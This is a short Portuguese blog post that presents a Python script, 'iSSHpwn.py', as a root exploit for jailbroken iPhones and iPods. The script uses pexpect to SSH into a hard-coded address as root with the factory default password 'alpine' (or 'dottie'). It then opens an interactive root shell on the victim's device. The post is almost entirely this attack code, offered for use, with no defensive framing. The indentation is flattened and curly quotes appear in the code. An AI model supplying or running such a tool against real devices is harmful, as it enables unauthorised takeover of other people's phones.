Assinatura RSS

Iphone || Ipod root exploit

Publicado em

Got root?

Requerimentos:
-Jailbroken instalado
-SSH server

#!/usr/bin/python
#iSSHpwn.py
#Coded in python by chroniccommand
#Simple 'exploit' to gain remote root on jailbroken iPod touch / iPhone's
#Victim must still have the default password on
#I use the term 'exploit' loosely

import os, pexpect, sys

#Default for iPod / iPhone 2G is alpine
alpine = “alpine”
#Default for iPod / iPhone 1G is dottie
dottie = “dottie”
print(“\t[+]Welcome to iSSHpwn”)
print(“\t[+]g0t r00t?”) # <= Maybe 😉
print(“\t[*]Using IP: 192.168.1.3”)
print(“\t[+]Trying to connect to port 22(SSH)…\n”)
print(“——————————————-“)
try:
foo = pexpect.spawn(‘ssh root@192.168.1.3’) #Connect via SSH
foo.expect(‘.*ssword:’)
foo.sendline(alpine) #Interchange with either dottie or alpine
print(“[+]g0t Sh3ll! Root acquired”)
print(“[+]Type ‘logout’ to end session”)
foo.interact() #Interact and spawn a shell
print(“\tHope you had fun ;)”)
except:
print(“\t[+]Spl0it failed :(“) #Well thats not good :/
print(“\t[+]Either the target is not jailbroken, SSH is closed or the password is neither alpine or dottie”)
sys.exit()

Deixe um comentário

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do WordPress.com

Você está comentando utilizando sua conta WordPress.com. Sair /  Alterar )

Foto do Google

Você está comentando utilizando sua conta Google. Sair /  Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair /  Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair /  Alterar )

Conectando a %s

%d blogueiros gostam disto: